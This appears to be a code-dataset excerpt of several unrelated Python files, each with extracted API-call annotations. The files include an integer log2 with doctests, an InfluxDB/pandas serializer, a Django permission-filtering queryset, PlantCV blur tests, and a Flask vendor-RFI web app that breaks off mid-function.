"myAzure.az_connect.AzureConnection"
] |
[((472, 489), 'myAzure.az_connect.AzureConnection', 'AzureConnection', ([], {}), '()\n', (487, 489), False, 'from myAzure.az_connect import AzureConnection\n'), ((731, 754), 'split_settings.tools.include', 'include', (['*base_settings'], {}), '(*base_settings)\n', (738, 754), False, 'from split_settings.tools import include, optional\n')]
|
def ilog2(n):
'''
    Return the floor of the base-2 logarithm of n.
>>> ilog2(0)
Traceback (most recent call last):
...
ValueError: math domain error
>>> ilog2(-10)
Traceback (most recent call last):
...
ValueError: math domain error
>>> [ilog2(i) for i in range(1, 10)]
[0, 1, 1, 2, 2, 2, 2, 3, 3]
>>> [ilog2(2**i) for i in range(1,10)]
[1, 2, 3, 4, 5, 6, 7, 8, 9]
>>> [ilog2((2**i)+1) for i in range(1,10)]
[1, 2, 3, 4, 5, 6, 7, 8, 9]
>>> [ilog2((2**i)-1) for i in range(1,10)]
[0, 1, 2, 3, 4, 5, 6, 7, 8]
'''
if n <= 0:
raise ValueError('math domain error')
return len(bin(n)) - 3
if __name__ == '__main__':
import doctest
doctest.testmod()
|
[
"doctest.testmod"
] |
[((718, 735), 'doctest.testmod', 'doctest.testmod', ([], {}), '()\n', (733, 735), False, 'import doctest\n')]
|
import re
from functools import reduce
from itertools import chain
from typing import Union, Dict, List
import pandas as pd
import numpy as np
from .common import *
DataFrameType = Union[pd.DataFrame, Dict[str, pd.DataFrame], List[Dict[str, pd.DataFrame]]]
# Serialization helper functions
# -------------------------------
def _serializer(series) -> pd.DataFrame:
df = pd.DataFrame(series.get('values', []), columns=series['columns'])
if 'time' not in df.columns:
return df
df: pd.DataFrame = df.set_index(pd.to_datetime(df['time'])).drop('time', axis=1)
df.index = df.index.tz_localize('UTC')
df.index.name = None
if 'tags' in series:
for k, v in series['tags'].items():
df[k] = v
if 'name' in series:
df.name = series['name']
return df
def _get_name(series):
tags = [f'{k}={v}' for k, v in series.get('tags', {}).items()]
return ','.join(filter(None, [series.get('name'), *tags])) or None
def _drop_zero_index(df):
if isinstance(df.index, pd.DatetimeIndex):
if all(i.value == 0 for i in df.index):
return df.reset_index(drop=True)
return df
def parse(resp) -> DataFrameType:
"""Makes a dictionary of DataFrames from a response object"""
statements = []
for statement in resp['results']:
series = {}
for s in statement.get('series', []):
series[_get_name(s)] = _drop_zero_index(_serializer(s))
statements.append(series)
if len(statements) == 1:
series: dict = statements[0]
if len(series) == 1:
return list(series.values())[0] # DataFrame
else:
return series # dict
return statements # list
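# Illustrative sketch (added for this write-up; the payload below is a made-up
# example shaped like an InfluxDB /query response): a single statement with one
# series parses straight to a DataFrame.
def _demo_parse():
    resp = {'results': [{'series': [{
        'name': 'cpu',
        'columns': ['time', 'load'],
        'values': [['2020-01-01T00:00:00', 0.5], ['2020-01-01T00:01:00', 0.6]],
    }]}]}
    return parse(resp)  # DataFrame with a UTC DatetimeIndex and one 'load' column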
# Parsing helper functions
# -------------------------
def _itertuples(df):
"""Custom implementation of ``DataFrame.itertuples`` that
returns plain tuples instead of namedtuples. About 50% faster.
"""
cols = [df.iloc[:, k] for k in range(len(df.columns))]
return zip(df.index, *cols)
def _replace(df):
obj_cols = {k for k, v in dict(df.dtypes).items() if v is np.dtype('O')}
other_cols = set(df.columns) - obj_cols
obj_nans = (f'{k}="nan"' for k in obj_cols)
other_nans = (f'{k}=nani?' for k in other_cols)
replacements = [
('|'.join(chain(obj_nans, other_nans)), ''),
(',{2,}', ','),
('|'.join([', ,', ', ', ' ,']), ' '),
]
return replacements
def serialize(df, measurement, tag_columns=None, **extra_tags) -> bytes:
"""Converts a Pandas DataFrame into line protocol format"""
# Pre-processing
if measurement is None:
raise ValueError("Missing 'measurement'")
if not isinstance(df.index, pd.DatetimeIndex):
raise ValueError('DataFrame index is not DatetimeIndex')
tag_columns = set(tag_columns or [])
isnull = df.isnull().any(axis=1)
# Make parser function
tags = []
fields = []
for k, v in extra_tags.items():
tags.append(f"{k}={escape(v, key_escape)}")
for i, (k, v) in enumerate(df.dtypes.items()):
k = k.translate(key_escape)
if k in tag_columns:
tags.append(f"{k}={{p[{i+1}]}}")
elif issubclass(v.type, np.integer):
fields.append(f"{k}={{p[{i+1}]}}i")
        elif issubclass(v.type, (np.bool_, np.floating)):
fields.append(f"{k}={{p[{i+1}]}}")
else:
# String escaping is skipped for performance reasons
# Strings containing double-quotes can cause strange write errors
# and should be sanitized by the user.
# e.g., df[k] = df[k].astype('str').str.translate(str_escape)
fields.append(f"{k}=\"{{p[{i+1}]}}\"")
fmt = (f'{measurement}', f'{"," if tags else ""}', ','.join(tags),
' ', ','.join(fields), ' {p[0].value}')
f = eval("lambda p: f'{}'".format(''.join(fmt)))
# Map/concat
if isnull.any():
lp = map(f, _itertuples(df[~isnull]))
rep = _replace(df)
lp_nan = (reduce(lambda a, b: re.sub(*b, a), rep, f(p))
for p in _itertuples(df[isnull]))
return '\n'.join(chain(lp, lp_nan)).encode('utf-8')
else:
return '\n'.join(map(f, _itertuples(df))).encode('utf-8')
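# Illustrative sketch (added for this write-up; measurement and column names are
# made up): two rows become two line-protocol records, e.g.
# b'weather,city=berlin temp=21.5 1577836800000000000'.
def _demo_serialize():
    idx = pd.to_datetime(['2020-01-01', '2020-01-02'])
    df = pd.DataFrame({'city': ['berlin', 'paris'], 'temp': [21.5, 19.0]}, index=idx)
    return serialize(df, 'weather', tag_columns=['city'])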
|
[
"numpy.dtype",
"pandas.to_datetime",
"itertools.chain",
"re.sub"
] |
[((533, 559), 'pandas.to_datetime', 'pd.to_datetime', (["df['time']"], {}), "(df['time'])\n", (547, 559), True, 'import pandas as pd\n'), ((2106, 2119), 'numpy.dtype', 'np.dtype', (['"""O"""'], {}), "('O')\n", (2114, 2119), True, 'import numpy as np\n'), ((2304, 2331), 'itertools.chain', 'chain', (['obj_nans', 'other_nans'], {}), '(obj_nans, other_nans)\n', (2309, 2331), False, 'from itertools import chain\n'), ((4044, 4057), 're.sub', 're.sub', (['*b', 'a'], {}), '(*b, a)\n', (4050, 4057), False, 'import re\n'), ((4147, 4164), 'itertools.chain', 'chain', (['lp', 'lp_nan'], {}), '(lp, lp_nan)\n', (4152, 4164), False, 'from itertools import chain\n')]
|
from django.db.models import Q, QuerySet
from utilities.permissions import permission_is_exempt
class RestrictedQuerySet(QuerySet):
def restrict(self, user, action='view'):
"""
Filter the QuerySet to return only objects on which the specified user has been granted the specified
permission.
:param user: User instance
:param action: The action which must be permitted (e.g. "view" for "dcim.view_site"); default is 'view'
"""
# Resolve the full name of the required permission
app_label = self.model._meta.app_label
model_name = self.model._meta.model_name
permission_required = f'{app_label}.{action}_{model_name}'
# Bypass restriction for superusers and exempt views
if user.is_superuser or permission_is_exempt(permission_required):
qs = self
# User is anonymous or has not been granted the requisite permission
elif not user.is_authenticated or permission_required not in user.get_all_permissions():
qs = self.none()
# Filter the queryset to include only objects with allowed attributes
else:
attrs = Q()
for perm_attrs in user._object_perm_cache[permission_required]:
if type(perm_attrs) is list:
for p in perm_attrs:
attrs |= Q(**p)
elif perm_attrs:
attrs |= Q(**perm_attrs)
else:
# Any permission with null constraints grants access to _all_ instances
attrs = Q()
break
qs = self.filter(attrs)
return qs
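# Hedged usage sketch (illustration only; the model below is hypothetical, not
# part of this module):
#
#     class Site(models.Model):
#         objects = RestrictedQuerySet.as_manager()
#
#     visible = Site.objects.restrict(request.user, 'view')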
|
[
"utilities.permissions.permission_is_exempt",
"django.db.models.Q"
] |
[((799, 840), 'utilities.permissions.permission_is_exempt', 'permission_is_exempt', (['permission_required'], {}), '(permission_required)\n', (819, 840), False, 'from utilities.permissions import permission_is_exempt\n'), ((1181, 1184), 'django.db.models.Q', 'Q', ([], {}), '()\n', (1182, 1184), False, 'from django.db.models import Q, QuerySet\n'), ((1380, 1386), 'django.db.models.Q', 'Q', ([], {}), '(**p)\n', (1381, 1386), False, 'from django.db.models import Q, QuerySet\n'), ((1449, 1464), 'django.db.models.Q', 'Q', ([], {}), '(**perm_attrs)\n', (1450, 1464), False, 'from django.db.models import Q, QuerySet\n'), ((1607, 1610), 'django.db.models.Q', 'Q', ([], {}), '()\n', (1608, 1610), False, 'from django.db.models import Q, QuerySet\n')]
|
import cv2
import numpy as np
from plantcv.plantcv import gaussian_blur
def test_gaussian_blur(test_data):
"""Test for PlantCV."""
# Read in test data
img = cv2.imread(test_data.small_rgb_img)
gaussian_img = gaussian_blur(img=img, ksize=(51, 51), sigma_x=0, sigma_y=None)
assert np.average(img) != np.average(gaussian_img)
def test_gaussian_blur_grayscale(test_data):
"""Test for PlantCV."""
# Read in test data
gray_img = cv2.imread(test_data.small_gray_img, -1)
gaussian_img = gaussian_blur(img=gray_img, ksize=(51, 51), sigma_x=0, sigma_y=None)
assert np.average(gray_img) != np.average(gaussian_img)
|
[
"cv2.imread",
"numpy.average",
"plantcv.plantcv.gaussian_blur"
] |
[((171, 206), 'cv2.imread', 'cv2.imread', (['test_data.small_rgb_img'], {}), '(test_data.small_rgb_img)\n', (181, 206), False, 'import cv2\n'), ((226, 289), 'plantcv.plantcv.gaussian_blur', 'gaussian_blur', ([], {'img': 'img', 'ksize': '(51, 51)', 'sigma_x': '(0)', 'sigma_y': 'None'}), '(img=img, ksize=(51, 51), sigma_x=0, sigma_y=None)\n', (239, 289), False, 'from plantcv.plantcv import gaussian_blur\n'), ((459, 499), 'cv2.imread', 'cv2.imread', (['test_data.small_gray_img', '(-1)'], {}), '(test_data.small_gray_img, -1)\n', (469, 499), False, 'import cv2\n'), ((519, 587), 'plantcv.plantcv.gaussian_blur', 'gaussian_blur', ([], {'img': 'gray_img', 'ksize': '(51, 51)', 'sigma_x': '(0)', 'sigma_y': 'None'}), '(img=gray_img, ksize=(51, 51), sigma_x=0, sigma_y=None)\n', (532, 587), False, 'from plantcv.plantcv import gaussian_blur\n'), ((301, 316), 'numpy.average', 'np.average', (['img'], {}), '(img)\n', (311, 316), True, 'import numpy as np\n'), ((320, 344), 'numpy.average', 'np.average', (['gaussian_img'], {}), '(gaussian_img)\n', (330, 344), True, 'import numpy as np\n'), ((599, 619), 'numpy.average', 'np.average', (['gray_img'], {}), '(gray_img)\n', (609, 619), True, 'import numpy as np\n'), ((623, 647), 'numpy.average', 'np.average', (['gaussian_img'], {}), '(gaussian_img)\n', (633, 647), True, 'import numpy as np\n')]
|
from __future__ import print_function, division
import numpy as np
import sys
scalarTypes = (complex, float, int, np.number)
if sys.version_info < (3,):
scalarTypes += (long, )
def isScalar(f):
if isinstance(f, scalarTypes):
return True
elif isinstance(f, np.ndarray) and f.size == 1 and isinstance(f[0], scalarTypes):
return True
return False
def asArray_N_x_Dim(pts, dim):
if type(pts) == list:
pts = np.array(pts)
assert isinstance(pts, np.ndarray), "pts must be a numpy array"
if dim > 1:
pts = np.atleast_2d(pts)
elif len(pts.shape) == 1:
pts = pts[:, np.newaxis]
assert pts.shape[1] == dim, "pts must be a column vector of shape (nPts, {0:d}) not ({1:d}, {2:d})".format(*((dim,)+pts.shape))
return pts
def requires(modules):
"""Decorator to wrap functions with soft dependencies.
This function was inspired by the `requires` function of pysal,
which is released under the 'BSD 3-Clause "New" or "Revised" License'.
https://github.com/pysal/pysal/blob/master/pysal/lib/common.py
Parameters
----------
modules : dict
Dictionary containing soft dependencies, e.g.,
{'matplotlib': matplotlib}.
Returns
-------
decorated_function : function
Original function if all soft dependencies are met, otherwise
it returns an empty function which prints why it is not running.
"""
# Check the required modules, add missing ones in the list `missing`.
missing = []
for key, item in modules.items():
if item is False:
missing.append(key)
def decorated_function(function):
"""Wrap function."""
if not missing:
return function
else:
def passer(*args, **kwargs):
print(('Missing dependencies: {d}.'.format(d=missing)))
print(('Not running `{}`.'.format(function.__name__)))
return passer
return decorated_function
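# Illustrative usage (added for this write-up): guard a helper on an optional
# matplotlib dependency; if it is missing, the wrapped function only reports
# why it cannot run instead of raising.
try:
    import matplotlib
except ImportError:
    matplotlib = False

@requires({'matplotlib': matplotlib})
def _demo_plot():
    print('matplotlib is available')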
|
[
"numpy.array",
"numpy.atleast_2d"
] |
[((460, 473), 'numpy.array', 'np.array', (['pts'], {}), '(pts)\n', (468, 473), True, 'import numpy as np\n'), ((585, 603), 'numpy.atleast_2d', 'np.atleast_2d', (['pts'], {}), '(pts)\n', (598, 603), True, 'import numpy as np\n')]
|
from flask import Flask
from flask import render_template
from flask import request
#from flask_wtf import CsrfProtect #this is what the video said, but it gives a warning; the one on the line below works without warnings
from flask_wtf import CSRFProtect
import forms
from flask import make_response #for the cookie
from flask import session
from flask import url_for
from flask import redirect
from flask import flash
from flask import g #to allow global variables. They will be alive until the end of after_request, i.e. return response.
#It lives for only one request. Two clients cannot share the same global variable.
from config import DevelopmentConfig
from models import db
from models import userstest #the name of the MODEL to import, not the table
#from models import Comment in CF
from models import comments
from helper import date_format
from flask_mail import Mail
from flask_mail import Message
import threading #to send the emails in the background so the app is faster
from flask import copy_current_request_context
#after CF
from models import vendors, rfielements_providers, rfielements_analysts, suitemodcatelem, vendors_rfi, suitemodules, suitemodcat, category_names, element_names, elementvariants, current_quarteryear, users
#####Just for creating raw MySQL queries########
from sqlalchemy import create_engine
eng = create_engine(DevelopmentConfig.SQLALCHEMY_DATABASE_URI)
################################################
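# Hedged sketch (illustration only; the table name is an assumption): `eng` above
# is meant for raw SQL queries such as:
#     with eng.connect() as conn:
#         rows = conn.execute('SELECT * FROM vendors').fetchall()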
import sys
import urllib.parse #to encode urls
import pandas as pd
pd.set_option('display.expand_frame_repr', False) #just to make the print of pandas wider
from sqlalchemy import desc, func, and_, or_
import json
from helper import previous_quarter_year, next_quarter_year, last_self_score, last_sm_score
import numpy as np
from flask_admin import Admin
from flask_admin.contrib.sqla import ModelView
from flask_admin import BaseView, expose
app = Flask(__name__)
app.config.from_object(DevelopmentConfig) #here is where we decide if Development or Production.
#before using config:
#app.secret_key = 'my_secret_key' #though it is a good practice to use os.get() to get the secret key, and not write it in the code
#before using config:
#csrf = CsrfProtect(app)
#after config
#csrf = CsrfProtect() #now we do this at the end, in if __name__...
#this is what the video said, but it gives a warning; the one on the line below works without warnings
#csrf = CSRFProtect() THIS WASN'T WORKING
csrf = CSRFProtect(app) #from https://flask-wtf.readthedocs.io/en/stable/csrf.html
mail = Mail()
def send_email(user_email, username): #to know where to send it and write the username in the email
    msg = Message('Thank you for signing up!', #subject of the email.
sender = app.config['MAIL_USERNAME'],
recipients = [user_email])
msg.html = render_template('email.html', username = username)
mail.send(msg) #here we actually send the message
@app.errorhandler(404)
def page_not_found(e): #anything works, not only an 'e'
return render_template('404.html'), 404 #flask doesn't send the error number, we have to do it.
@app.before_request #we use this to validate, e.g. whether the user has permission to access that url, or even to keep a visit counter for that url
def before_request():
if 'username' not in session:
print (request.endpoint) #this gives you the last part of the url
print ('User needs to log in!')
#validate the url...validate if the user is authenticated, let's imagine we want to make 'comment' only accessible to authenticated users
if 'username' not in session and request.endpoint in ['comment']:
return redirect(url_for('login'))
elif 'username' in session and request.endpoint in ['login', 'create']: #why an authenticated user would go to login or create, let's send him/her to index
return redirect(url_for('index')) #the function index, not the route.
    g.test = 'test' #here we create the global variables. (Perhaps we could pull all of one vendor's data here?)
@app.route('/')
def index():
'''
#we are reading cookies here
#custome_cookie = request.cookies.get('custome_cookie') this would receive the custome_cookie we created and sent ('Eduardo')
custome_cookie = request.cookies.get('custome_cookies', 'Undefined') #this does: if you don't find custome_cookie within custome_cookies, it returns undefined
print (custome_cookie)
'''
if 'username' in session: #session is our sessions dictionary
username = session['username']
title = "Index"
return render_template('index.html', title = title)
@app.route('/logout') #here we destroy the cookies
def logout():
if 'username' in session:
session.pop('username') #destroy cookie
return redirect(url_for('login')) # to redirect, using url_for we type the function name, not the path, so just 'login', no /asddad/adad/login
@app.route('/login', methods = ['GET', 'POST'])
def login():
login_form = forms.LoginForm(request.form)
if request.method == 'POST' and login_form.validate():
username = login_form.username.data
password = login_form.password.data
        user = userstest.query.filter_by(username = username).first() #select * from users where username = username limit 1. It returns an object with the information of the user. If not found, it will return None
if user is not None and user.verify_password(password):
success_message = 'Welcome {}'.format(username)
flash(success_message)
session['username'] = username
session['user_id'] = user.id
return redirect( url_for('index') )
else:
error_message = 'Invalid username or password'
flash(error_message)
    #after adding session['username'] = username a few lines above, isn't this one left over?
#session['username'] = login_form.username.data #a session variable called username will be created each time whose value is the own username
return render_template('login.html', form = login_form)
@app.route('/cookie')
def cookie():
#we are creating cookies here
response = make_response( render_template('cookie.html'))
response.set_cookie('custome_cookie', 'Eduardo')
return response
#by default in flask, only method GET, we have to specify POST
@app.route('/comment', methods = ['GET', 'POST'])
def comment():
comment_form = forms.CommentForm(request.form)
    if request.method == 'POST' and comment_form.validate(): #to validate form inputs. We also had to add it in _macro.html, in the list {{field.errors}}
'''print(comment_form.username.data)
print(comment_form.email.data)
print(comment_form.comment.data)
else:
print ("Error in the form!!")'''
user_id = session['user_id'] #since we work with cookies, this is the way to get the user_id
comment = comments(user_id = user_id,
text = comment_form.comment.data)
print(comment)
db.session.add(comment)
db.session.commit()
success_message = "New comment created"
flash(success_message)
title = "Flask Course"
return render_template('comment.html', title = title, comment_form = comment_form)
@app.route('/create', methods = ['GET', 'POST'])
def create():
create_form = forms.CreateForm(request.form)
if request.method == 'POST' and create_form.validate():
user = userstest(create_form.username.data,
create_form.password.data,
create_form.email.data)
        db.session.add(user) #this needs an object inherited from Model, like user
db.session.commit() #here we insert it in the database
        #SQLAlchemy is clever enough to know how to open and close connections, so we don't have to worry about that if we write those two lines.
@copy_current_request_context #this is like the bridge to send the email in the background..
def send_message(email,username):
send_email(email, username)
sender = threading.Thread(name='mail_sender',
target = send_message,
args = (user.email, user.username)) #arguments of the function that sends the email.
sender.start()
success_message = 'User registered in the database'
flash(success_message)
return render_template('create.html', form = create_form)
@app.route('/reviews/', methods=['GET'])
@app.route('/reviews/<int:page>', methods = ['GET']) #we have to write it twice to make pages
def reviews(page = 1): # =1 is only the default value, so /reviews/ and /reviews/1 are the same
per_page = 1000
comment_list = comments.query.join(userstest).add_columns(
userstest.username, #the model, not the table
comments.text,
comments.created_date).paginate(page,per_page,True) #(page, rows per page, if True=404, if False: empty)
return render_template('reviews.html', comments = comment_list, date_format = date_format) #we send the function as a parameter
@app.after_request
def after_request(response):
return response #always return response
@app.route('/rfi/', methods=['GET'])
@app.route('/rfi/<vendor_name>/', methods=['GET'], defaults={ 'module_name' : None})
@app.route('/rfi/<vendor_name>/<module_name>/', methods=['GET', 'POST'])
def rfi(vendor_name, module_name):
vendorid = vendors.query.filter_by(vendor_name = vendor_name).add_columns(vendors.vendorid).first()[1]
current_quarter = current_quarteryear.query.add_columns(current_quarteryear.quarter).first()[1]
current_year = current_quarteryear.query.add_columns(current_quarteryear.year).first()[1]
print('current quarter:', current_quarter, current_year)
if module_name is None:
title = vendor_name
'''
        This commented block pulled every module a vendor had participated in, looking at rfielements, but it's better to do it through the table vendors_rfi
smce_ids_list_raw = rfielements.query.filter_by(vendor_id = vendorid).add_columns(rfielements.smce_id).all()
smce_ids_list = set()
for item in smce_ids_list_raw:
smce_ids_list.add(item[1])
module_ids_list_raw = suitemodcatelem.query.filter(suitemodcatelem.smceid.in_(smce_ids_list)).add_columns(suitemodcatelem.module_id).all()
module_ids_list = set()
for item in module_ids_list_raw:
module_ids_list.add(item[1])
module_ids_list = sorted(module_ids_list)
print(module_ids_list)
module_names_raw = modules.query.filter(modules.moduleid.in_(module_ids_list)).add_columns(modules.module_name).all()
module_names = []
for item in module_names_raw:
module_names.append(item[1])
print(module_names)
'''
suitemod_ids_raw = vendors_rfi.query.filter_by(vendor_id = vendorid).filter_by(quarter = current_quarter).filter_by(year = current_year).add_columns(vendors_rfi.suitemod_id, vendors_rfi.status, vendors_rfi.current_round).all()
print('suitemod_ids_raw',suitemod_ids_raw)
module_status_round = []
for item in suitemod_ids_raw:
module_name = suitemodules.query.filter_by(suitemodid = item[1]).order_by(desc(suitemodules.update_date)).add_columns(suitemodules.suitemod_name).first()[1]
if item[2] == 'N':
status = 'New'
elif item[2] == 'R':
status = 'Refreshing'
elif item[2] == 'E':
status = 'Existing'
elif item[2] == 'Z':
                status = 'Not participating anymore'
else:
                sys.exit('Status is not one of N, R, E or Z')
current_round = item[3]
module_status_round.append([module_name, status, current_round])
print('module_status_round', module_status_round)
return render_template('rfi:vendor.html', title = title, vendor_name = vendor_name, module_status_round = module_status_round, urllib_parse_quote = urllib.parse.quote)
else:
title = vendor_name + ' - ' + module_name
suitemodid = suitemodules.query.filter_by(suitemod_name = module_name).add_columns(suitemodules.suitemodid).first()[1]
status = vendors_rfi.query.filter_by(vendor_id = vendorid).filter_by(suitemod_id = suitemodid).filter_by(quarter = current_quarter).filter_by(year = current_year).add_columns(vendors_rfi.status).first()[1]
current_round = vendors_rfi.query.filter_by(vendor_id = vendorid).filter_by(suitemod_id = suitemodid).filter_by(quarter = current_quarter).filter_by(year = current_year).add_columns(vendors_rfi.current_round).first()[1]
form = forms.ElementForm(request.form)
'''if status == 'N' or status == 'R': Not necessary anymore since now current_round is 0, 1 or 2.
current_round = vendors_rfi.query.filter_by(vendor_id = vendorid).filter_by(suitemod_id = suitemodid).add_columns(vendors_rfi.current_round).first()[1]'''
print('status', status, '\ncurrent_round', current_round)
print('suitemodid', suitemodid)
suitemodcat_list_raw = suitemodcat.query.filter_by(suitemod_id = suitemodid).add_columns(suitemodcat.suitemodcatid, suitemodcat.category_name_id).all()
suitemodcat_list = []
category_name_ids_list = [] #same lenght as suitemodcat_list
for item in suitemodcat_list_raw:
suitemodcat_list.append(item[1])
category_name_ids_list.append(item[2])
print('suitemodcat_list', suitemodcat_list)
ids_list_raw = []
for item in suitemodcat_list:
ids_list_raw.append(suitemodcatelem.query.filter_by(suitemodcat_id = item).add_columns(suitemodcatelem.suitemodcat_id, suitemodcatelem.smceid, suitemodcatelem.element_name_id, suitemodcatelem.variant_id).all())
ids_list = [] #[suitemodcatid, [scmeid, elementnameid, variantid]]
smce_ids_list = []
for item in suitemodcat_list: ids_list.append([item, []])
for item1 in ids_list_raw:
for item2 in item1:
index = suitemodcat_list.index(item2[1])
ids_list[index][1].append([item2[2],item2[3],item2[4]])
smce_ids_list.append(item2[2])
print('smce_ids_list', smce_ids_list)
last_provider_submission = rfielements_providers.query.filter_by(vendor_id = vendorid).filter(rfielements_providers.smce_id.in_(smce_ids_list)).order_by(desc(rfielements_providers.update_date)).add_columns(rfielements_providers.update_date, rfielements_providers.user_id).first()[1:] #[date, user_id]
print('last_provider_submission', last_provider_submission)
print('ids_list[0]', ids_list[0])
#Averages table
categories_names = []
for item in category_name_ids_list: categories_names.append(category_names.query.filter_by(category_nameid = item).add_columns(category_names.category_name).first()[1])
categories_names.append('Average Score')
categories_ss_averages = []
total_suitemod_ss_sum = 0
total_suitemod_ss_len = 0
for item1 in ids_list:
category_ss_sum = 0
category_ss_len = 0
for item2 in item1[1]:
try:
current_ss = last_self_score(vendorid, item2[0], current_quarter, current_year)
category_ss_sum += current_ss
category_ss_len += 1
total_suitemod_ss_sum += current_ss
total_suitemod_ss_len += 1
except TypeError: pass
try: category_ss_average = category_ss_sum/category_ss_len
except ZeroDivisionError: category_ss_average = '-'
categories_ss_averages.append(category_ss_average)
total_suitemod_ss_average = total_suitemod_ss_sum/total_suitemod_ss_len
categories_ss_averages.append(total_suitemod_ss_average)
print(categories_ss_averages)
categories_last_quarter_averages = []
categories_sm_averages = []
categories_benchmark_averages = []
for item in range(0,11):
categories_last_quarter_averages.append('lq' + str(item))
categories_sm_averages.append('sm' + str(item))
categories_benchmark_averages.append('b' + str(item))
print(categories_last_quarter_averages, categories_sm_averages, categories_benchmark_averages)
summary_table = []
for item1, item2, item3, item4, item5 in zip(categories_names, categories_ss_averages, categories_last_quarter_averages, categories_sm_averages, categories_benchmark_averages): summary_table.append([item1, item2, item3, item4, item5])
print(summary_table)
'''rfielements_info:
0 vendor_id
1 smce_id
2 quarter
3 year
4 round
5 self_score
6 self_description
7 attachment_id
8 sm_score
9 analyst_notes
'''
#rfielements_info_raw = rfielements.query.filter_by(vendor_id = vendorid).filter(rfielements.smce_id.in_(smce_ids_list)).add_columns(rfielements.vendor_id, rfielements.smce_id, rfielements.quarter, rfielements.year, rfielements.round, rfielements.self_score, rfielements.self_description, rfielements.attachment_id, rfielements.sm_score, rfielements.analyst_notes).all()
rfielements_providers_info_raw = rfielements_providers.query.filter_by(vendor_id = vendorid).filter(rfielements_providers.smce_id.in_(smce_ids_list)).add_columns(rfielements_providers.vendor_id, rfielements_providers.smce_id, rfielements_providers.quarter, rfielements_providers.year, rfielements_providers.round, rfielements_providers.self_score, rfielements_providers.self_description, rfielements_providers.attachment_id).all()
rfielements_analysts_info_raw = rfielements_analysts.query.filter_by(vendor_id = vendorid).filter(rfielements_analysts.smce_id.in_(smce_ids_list)).add_columns(rfielements_analysts.vendor_id, rfielements_analysts.smce_id, rfielements_analysts.quarter, rfielements_analysts.year, rfielements_analysts.round, rfielements_analysts.sm_score, rfielements_analysts.analyst_notes).all()
#df = pd.DataFrame(rfielements_info_raw)
df_providers = pd.DataFrame(rfielements_providers_info_raw)
df_providers = df_providers.where(df_providers.notnull(), None) #if there was a row with only a SD but not a SS: the SS appeared as nan
#df_providers['self_score'].astype(np.int64)
df_analysts = pd.DataFrame(rfielements_analysts_info_raw)
df_analysts = df_analysts.where(df_analysts.notnull(), None)
#df['yqr'] = df['year'].astype(str) + '-' + df['quarter'].astype(str) + '-' + df['round'].astype(str)
df_providers['yqr'] = df_providers['year'].astype(str) + '-' + df_providers['quarter'].astype(str) + '-' + df_providers['round'].astype(str)
df_analysts['yqr'] = df_analysts['year'].astype(str) + '-' + df_analysts['quarter'].astype(str) + '-' + df_analysts['round'].astype(str)
#yqdict = dict()
#for item in df.yqr.unique():
# yqdict[item] = df[df.yqr == item].drop(columns=['rfielements', 'vendor_id', 'quarter', 'year', 'round', 'smce_id', 'yqr']).dropna(how='all', axis=1)
yqdict_providers = dict()
for item in df_providers.yqr.unique():
yqdict_providers[item] = df_providers[df_providers.yqr == item].drop(columns=['rfielements_providers', 'vendor_id', 'quarter', 'year', 'round', 'smce_id', 'yqr']).dropna(how='all', axis=1)
yqdict_analysts = dict()
for item in df_analysts.yqr.unique():
yqdict_analysts[item] = df_analysts[df_analysts.yqr == item].drop(columns=['rfielements_analysts', 'vendor_id', 'quarter', 'year', 'round', 'smce_id', 'yqr']).dropna(how='all', axis=1)
#yqr_headers_dicts = [ {item:yqdict[item].columns.tolist()} for item in sorted(yqdict.keys()) ]
#print('yqr_headers_dicts', yqr_headers_dicts)
yqr_headers_providers_dicts = [ {item:yqdict_providers[item].columns.tolist()} for item in sorted(yqdict_providers.keys()) ]
print('yqr_headers_providers_dicts', yqr_headers_providers_dicts)
yqr_headers_analysts_dicts = [ {item:yqdict_analysts[item].columns.tolist()} for item in sorted(yqdict_analysts.keys()) ]
print('yqr_headers_analysts_dicts', yqr_headers_analysts_dicts)
#merge yqr_headers_providers_dicts and yqr_headers_analysts_dicts into yqr_headers_dicts
yqr_headers_dicts_unsorted = yqr_headers_providers_dicts
for item_analysts in yqr_headers_analysts_dicts:
for item in yqr_headers_dicts_unsorted:
if list(item_analysts.keys())[0] in item:
for item2 in item_analysts.get(list(item_analysts.keys())[0]):
item[list(item_analysts.keys())[0]].append(item2)
break
else:
yqr_headers_dicts_unsorted.append(item_analysts)
break
#sort yqr_headers_dict
keys_list = []
for item in yqr_headers_dicts_unsorted: keys_list.append(list(item.keys())[0])
keys_list.sort()
yqr_headers_dicts = []
for item1 in keys_list:
for item2 in yqr_headers_dicts_unsorted:
if item1 == list(item2.keys())[0]:
print('yes', item1, item2)
yqr_headers_dicts.append({item1: item2[item1]})
break
print('final yqr_headers_dict: ', yqr_headers_dicts)
#delete current_year & current_quarter item
indexes = [] #this will be necessary in case we have to delete two rounds
for index, dictionary in enumerate(yqr_headers_dicts):
for key in dictionary:
if int(key.split('-')[0]) == current_year and int(key.split('-')[1]) == current_quarter:
indexes.append(index)
for index in reversed(indexes): #it must be backwards since we are removing elements from the list.
del yqr_headers_dicts[index]
yq_headers2 = []
yqr_headers_len = []
for item in yqr_headers_dicts:
yq_headers2.append(list(item.keys()))
yqr_headers_len.append(len(list(item.values())[0]))
print('yqr_headers_len', yqr_headers_len)
for item1, item2 in zip(yq_headers2, yqr_headers_len): item1.append(item2)
#print('yq_headers2', yq_headers2)
yq_headers = []
for item in yq_headers2:
if [item[0].split('-')[0] + '-' + item[0].split('-')[1]] not in yq_headers: yq_headers.append([item[0].split('-')[0] + '-' + item[0].split('-')[1]])
for item in yq_headers: item.append(0)
for item1 in yq_headers2:
aux = item1[0].split('-')[0] + '-' + item1[0].split('-')[1]
for item2 in yq_headers:
if aux == item2[0]:
item2[1] += item1[1]
break
for item in yq_headers: item[0] = [item[0].split('-')[0], item[0].split('-')[1]]
        #yq_headers will define the first header.
print('yq_headers', yq_headers)
#yqr_headers will define the second header
yqr_headers2 = []
yqr_headers_columns = []
yqr_headers3 = []
yqr_headers=[]
for item in yqr_headers_dicts:
yqr_headers2.append(list(item.keys()))
yqr_headers_columns.append(list(item.values())[0])
for item1 in yqr_headers_columns:
for item2 in range(len(item1)):
if item1[item2] == 'self_score': item1[item2] = 5
elif item1[item2] == 'self_description': item1[item2] = 6
elif item1[item2] == 'attachment_id': item1[item2] = 7
elif item1[item2] == 'sm_score': item1[item2] = 8
elif item1[item2] == 'analyst_notes': item1[item2] = 9
for item1, item2 in zip(yqr_headers2, yqr_headers_columns): yqr_headers3.append(((int(item1[0].split('-')[0]), int(item1[0].split('-')[1]), int(item1[0].split('-')[2])), item2))
for item1 in yqr_headers3:
for item2 in item1[1]:
yqr_headers.append((item1[0], item2))
